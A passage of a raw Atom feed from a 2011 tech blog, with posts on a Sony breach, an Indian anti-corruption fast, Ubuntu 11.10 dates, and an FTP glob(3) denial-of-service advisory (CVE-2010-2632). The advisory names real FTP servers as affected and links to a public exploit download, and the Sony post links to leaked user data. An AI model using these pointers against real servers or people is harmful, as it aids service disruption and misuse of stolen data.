&lt;span class="Apple-style-span" style="font-size: medium;"&gt;The data extracted by the hacker contains 120 users' data, as posted on a public text sharing site &lt;a href="http://pastebin.com/aXLkmNmR"&gt;Pastebin.com&lt;/a&gt;.&lt;/span&gt;&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://2.bp.blogspot.com/-yW2hZAZYOyw/Tel_AfcOCUI/AAAAAAAACIg/LRncTAZzEuI/s1600/Untitled1.png" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="196" src="http://2.bp.blogspot.com/-yW2hZAZYOyw/Tel_AfcOCUI/AAAAAAAACIg/LRncTAZzEuI/s320/Untitled1.png" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;span class="Apple-style-span" style="font-size: medium;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/3749417081738719676-5875617132888720180?l=jaguargeek.blogspot.com' alt='' /&gt;&lt;/div&gt;&lt;div class="feedflare"&gt;
&lt;/div&gt;</content><link rel="replies" type="application/atom+xml" href="http://jaguargeek.blogspot.com/feeds/5875617132888720180/comments/default" title="Post Comments" /><link rel="replies" type="text/html" href="http://jaguargeek.blogspot.com/2011/06/sony-hacked-for-12th-time.html#comment-form" title="0 Comments" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/3749417081738719676/posts/default/5875617132888720180?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/3749417081738719676/posts/default/5875617132888720180?v=2" /><link rel="alternate" type="text/html" href="http://jaguargeek.blogspot.com/2011/06/sony-hacked-for-12th-time.html" title="Sony Hacked for 12th time !!" /><author><name>alphajatin</name><uri>http://www.blogger.com/profile/18215607019961941523</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="31" height="22" src="http://3.bp.blogspot.com/-W7BcgsI2r3Q/TWXKkq2V1NI/AAAAAAAAACI/dlla8CM4IMw/s220/161511_1019201717_4315499_n.jpg" /></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://1.bp.blogspot.com/-tp5OhqWtOTo/Tel9bPuo2zI/AAAAAAAACIY/uCrmHrA-N_Y/s72-c/sony-hacked-again+%25281%2529.jpg" height="72" width="72" /><thr:total>0</thr:total></entry><entry gd:etag="W/&quot;AkUNRXg7eip7ImA9WhZUEUg.&quot;"><id>tag:blogger.com,1999:blog-3749417081738719676.post-1659098199260509648</id><published>2011-06-04T09:00:00.001+05:30</published><updated>2011-06-04T09:01:34.602+05:30</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2011-06-04T09:01:34.602+05:30</app:edited><category scheme="http://www.blogger.com/atom/ns#" term="Latest News" /><title>Baba Ramdev begins fast against corruption</title><content type="html">Baba Ramdev began his hunger strike at the Ramlila Maidan in Delhi at  sharp 7 am today. He describes his fast as "a satyagraha against  corruption."&lt;br /&gt;
&lt;br /&gt;
Thousands of his supporters have already gathered there and many more  are expected to join him through the day. VHP's Sadhvi Rithambara also  shared the stage with him. &lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://1.bp.blogspot.com/-eleFlS0Vi-I/Temmy_c0npI/AAAAAAAAAFo/TdoPRcVBE1Q/s1600/swami_ramdev_yoga_classes1.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="320" src="http://1.bp.blogspot.com/-eleFlS0Vi-I/Temmy_c0npI/AAAAAAAAAFo/TdoPRcVBE1Q/s320/swami_ramdev_yoga_classes1.jpg" width="272" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;
Keep Rocking, Keep Hacking&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/3749417081738719676-1659098199260509648?l=jaguargeek.blogspot.com' alt='' /&gt;&lt;/div&gt;&lt;div class="feedflare"&gt;
&lt;/div&gt;</content><link rel="replies" type="application/atom+xml" href="http://jaguargeek.blogspot.com/feeds/1659098199260509648/comments/default" title="Post Comments" /><link rel="replies" type="text/html" href="http://jaguargeek.blogspot.com/2011/06/baba-ramdev-begins-fast-against.html#comment-form" title="0 Comments" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/3749417081738719676/posts/default/1659098199260509648?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/3749417081738719676/posts/default/1659098199260509648?v=2" /><link rel="alternate" type="text/html" href="http://jaguargeek.blogspot.com/2011/06/baba-ramdev-begins-fast-against.html" title="Baba Ramdev begins fast against corruption" /><author><name>alphajatin</name><uri>http://www.blogger.com/profile/18215607019961941523</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="31" height="22" src="http://3.bp.blogspot.com/-W7BcgsI2r3Q/TWXKkq2V1NI/AAAAAAAAACI/dlla8CM4IMw/s220/161511_1019201717_4315499_n.jpg" /></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://1.bp.blogspot.com/-eleFlS0Vi-I/Temmy_c0npI/AAAAAAAAAFo/TdoPRcVBE1Q/s72-c/swami_ramdev_yoga_classes1.jpg" height="72" width="72" /><thr:total>0</thr:total></entry><entry gd:etag="W/&quot;DEYMR308cCp7ImA9WhZWGEw.&quot;"><id>tag:blogger.com,1999:blog-3749417081738719676.post-1972102505640107495</id><published>2011-05-19T20:13:00.000+05:30</published><updated>2011-05-19T20:13:06.378+05:30</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2011-05-19T20:13:06.378+05:30</app:edited><category scheme="http://www.blogger.com/atom/ns#" term="Announcements" /><category scheme="http://www.blogger.com/atom/ns#" term="Ubuntu" /><title>Ubuntu 11:10 release</title><content type="html">&lt;strong&gt;The tentative&amp;nbsp;release&amp;nbsp;schedule for the Ubuntu 11.10 development cycle has been made 
available.&lt;/strong&gt;&lt;br /&gt;
As with all release schedules the dates listed below are subject to  change. If you’re landing on this page in July, August or even October  you are advised to refer to&amp;nbsp;&lt;a href="https://wiki.ubuntu.com/OneiricReleaseSchedule"&gt;wiki.ubuntu.com/OneiricReleaseSchedule&lt;/a&gt; to see the most up-to-date version.&lt;br /&gt;
For folks in the ‘now’, the dates bound for your&amp;nbsp;diaries/calendar apps are:&lt;br /&gt;
&lt;ul&gt;&lt;li&gt;&lt;strong&gt;June 2nd&lt;/strong&gt; Alpha 1&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;June 30th&lt;/strong&gt; Alpha 2&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;August 4th&lt;/strong&gt; Alpha 3&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;September 1st&lt;/strong&gt; Beta 1&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;September 22nd &lt;/strong&gt;Beta 2&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;October 13th&lt;/strong&gt; Ubuntu 11.10&lt;/li&gt;
&lt;/ul&gt;A fanboy note: Oneiric will be the second release of Ubuntu to be  made available on the 13th, the last being Ubuntu 5.10 Breezy Badger way  back in 2005.&lt;br /&gt;
&lt;ul&gt;&lt;li&gt;&lt;strong&gt;Ubuntu 4.10 &lt;/strong&gt;20th October&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Ubuntu 5.10 &lt;/strong&gt;13th October&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Ubuntu 6.10 &lt;/strong&gt;26th October&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Ubuntu 7.10 &lt;/strong&gt;18th October&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Ubuntu 8.10 &lt;/strong&gt;30th October&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Ubuntu 9.10 &lt;/strong&gt;29th October&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Ubuntu 10.10&lt;/strong&gt; 10th October&lt;/li&gt;
&lt;/ul&gt;&lt;br /&gt;
&lt;br /&gt;
Keep Rocking, Keep Hacking&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/3749417081738719676-1972102505640107495?l=jaguargeek.blogspot.com' alt='' /&gt;&lt;/div&gt;&lt;div class="feedflare"&gt;
&lt;/div&gt;</content><link rel="replies" type="application/atom+xml" href="http://jaguargeek.blogspot.com/feeds/1972102505640107495/comments/default" title="Post Comments" /><link rel="replies" type="text/html" href="http://jaguargeek.blogspot.com/2011/05/ubuntu-1110-release.html#comment-form" title="0 Comments" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/3749417081738719676/posts/default/1972102505640107495?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/3749417081738719676/posts/default/1972102505640107495?v=2" /><link rel="alternate" type="text/html" href="http://jaguargeek.blogspot.com/2011/05/ubuntu-1110-release.html" title="Ubuntu 11:10 release" /><author><name>alphajatin</name><uri>http://www.blogger.com/profile/18215607019961941523</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="31" height="22" src="http://3.bp.blogspot.com/-W7BcgsI2r3Q/TWXKkq2V1NI/AAAAAAAAACI/dlla8CM4IMw/s220/161511_1019201717_4315499_n.jpg" /></author><thr:total>0</thr:total></entry><entry gd:etag="W/&quot;DEUBR3s6eip7ImA9WhZXFEw.&quot;"><id>tag:blogger.com,1999:blog-3749417081738719676.post-6672006981042074925</id><published>2011-05-03T15:14:00.002+05:30</published><updated>2011-05-03T15:20:56.512+05:30</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2011-05-03T15:20:56.512+05:30</app:edited><category scheme="http://www.blogger.com/atom/ns#" term="Hacker's News" /><title>0day Exploit Released : Adobe, HP, Sun, Microsoft Interix &amp; many more Vendors FTP hackable !</title><content type="html">&lt;div dir="ltr" style="text-align: left;"&gt;&lt;div dir="ltr" style="text-align: left;"&gt;&lt;span class="Apple-style-span" style="font-size: medium;"&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="color: red;"&gt;0day Exploit &lt;/span&gt;&lt;/b&gt;Released : &lt;span class="Apple-style-span" style="color: red;"&gt;&lt;b&gt;Adobe, HP, Sun, 
Microsoft Interix&lt;/b&gt;&lt;/span&gt; &amp;amp; many more Vendors&lt;span class="Apple-style-span" style="color: red;"&gt;&lt;b&gt; FTP hackable &lt;/b&gt;&lt;/span&gt;!&lt;/span&gt;&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://3.bp.blogspot.com/-Kz0CKrv6QyE/Tb-75uVR4HI/AAAAAAAABxA/MKr22Rihm5M/s1600/Exploit-Code-for-Fourth-Stuxnet-Zero-Day-Publicly-Released-2.jpg" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="300" src="http://3.bp.blogspot.com/-Kz0CKrv6QyE/Tb-75uVR4HI/AAAAAAAABxA/MKr22Rihm5M/s400/Exploit-Code-for-Fourth-Stuxnet-Zero-Day-Publicly-Released-2.jpg" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;span class="Apple-style-span" style="font-size: medium;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;b&gt;   &lt;br /&gt;
&lt;/b&gt;&lt;br /&gt;
&lt;a name='more'&gt;&lt;/a&gt;&lt;b&gt;Topic :&lt;/b&gt; Multiple Vendors libc/glob(3) resource exhaustion (+0day remote ftpd-anon)&lt;br /&gt;
&lt;b&gt;   CVE : &lt;/b&gt;CVE-2010-2632&lt;br /&gt;
&lt;b&gt;   CWE :&lt;/b&gt; CWE-NOMAPPING&lt;br /&gt;
&lt;b&gt;   SecurityRisk : &lt;/b&gt;Medium&lt;br /&gt;
&lt;b&gt;   Remote Exploit : &lt;/b&gt;Yes&lt;br /&gt;
&lt;b&gt;   Local Exploit : &lt;/b&gt;Yes&lt;br /&gt;
&lt;b&gt;   Victim interaction required : &lt;/b&gt;No&lt;br /&gt;
&lt;b&gt;   Credit :&lt;/b&gt; Maksymilian Arciemowicz&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;/div&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="color: #660000; font-size: medium;"&gt;Affected Software (verified):&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
- OpenBSD 4.7&lt;br /&gt;
- NetBSD 5.0.2&lt;br /&gt;
- FreeBSD 7.3/8.1&lt;br /&gt;
- Oracle Sun Solaris 10&lt;br /&gt;
- GNU Libc (glibc)&lt;br /&gt;
&lt;br /&gt;
&lt;span class="Apple-style-span" style="color: #660000; font-size: medium;"&gt;&lt;b&gt;Affected Ftp Servers:&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
- ftp.openbsd.org (verified 02.07.2010: "connection refused" and ban)&lt;br /&gt;
- ftp.netbsd.org (verified 02.07.2010: "connection limit of 160 reached"&amp;nbsp;and ban)&lt;br /&gt;
- ftp.freebsd.org&lt;br /&gt;
- ftp.adobe.com&lt;br /&gt;
- ftp.hp.com&lt;br /&gt;
- ftp.sun.com&lt;br /&gt;
- more more and more&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;&lt;span class="Apple-style-span" style="color: #660000; font-size: medium;"&gt;Affected Vendors (not verified):&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
- Apple&lt;br /&gt;
- Microsoft Interix&lt;br /&gt;
- HP&lt;br /&gt;
- more more more&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;&lt;span class="Apple-style-span" style="color: #660000; font-size: medium;"&gt;Exploit Download :&amp;nbsp;&lt;a href="http://www.exploit-db.com/exploits/15215/"&gt;http://www.exploit-db.com/exploits/15215/&lt;br /&gt;
&lt;br /&gt;
Source:TheHackerNews&lt;br /&gt;
&lt;/a&gt;&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/3749417081738719676-6672006981042074925?l=jaguargeek.blogspot.com' alt='' /&gt;&lt;/div&gt;&lt;div class="feedflare"&gt;
&lt;/div&gt;</content><link rel="replies" type="application/atom+xml" href="http://jaguargeek.blogspot.com/feeds/6672006981042074925/comments/default" title="Post Comments" /><link rel="replies" type="text/html" href="http://jaguargeek.blogspot.com/2011/05/0day-exploit-released-adobe-hp-sun.html#comment-form" title="0 Comments" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/3749417081738719676/posts/default/6672006981042074925?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/3749417081738719676/posts/default/6672006981042074925?v=2" /><link rel="alternate" type="text/html" href="http://jaguargeek.blogspot.com/2011/05/0day-exploit-released-adobe-hp-sun.html" title="0day Exploit Released : Adobe, HP, Sun, Microsoft Interix &amp; many more Vendors FTP hackable !" /><author><name>alphajatin</name><uri>http://www.blogger.com/profile/18215607019961941523</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="31" height="22" src="http://3.bp.blogspot.com/-W7BcgsI2r3Q/TWXKkq2V1NI/AAAAAAAAACI/dlla8CM4IMw/s220/161511_1019201717_4315499_n.jpg" /></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://3.bp.blogspot.com/-Kz0CKrv6QyE/Tb-75uVR4HI/AAAAAAAABxA/MKr22Rihm5M/s72-c/Exploit-Code-for-Fourth-Stuxnet-Zero-Day-Publicly-Released-2.jpg" height="72" width="72" /><thr:total>0</thr:total></entry></feed>

